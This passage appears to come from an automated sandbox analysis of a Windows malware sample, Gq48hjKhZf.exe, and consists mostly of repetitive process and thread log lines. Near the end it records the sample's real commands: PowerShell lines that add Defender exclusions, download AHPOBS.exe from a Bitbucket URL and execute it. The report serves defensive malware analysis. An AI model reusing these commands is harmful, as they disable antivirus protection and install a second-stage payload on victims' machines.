        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3417Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6374Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5415Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4370Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6653Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2931Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exe TID: 7576Thread sleep count: 298 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 3417 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 6374 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -8301034833169293s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 5415 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 4370 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -20291418481080494s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 6653 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 2931 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmpJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.tmpJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\9A83.tmpJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\Jump to behavior
        Source: Gq48hjKhZf.exe, 00000000.00000002.1780956281.00000000004AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (L_NECVMWar&Prod_VMware_SAbf-11d0-94f2-00a0c91efb8ws@
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: amsi64_7872.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: Gq48hjKhZf.exe PID: 7572, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat, type: DROPPED
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
        Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;Jump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
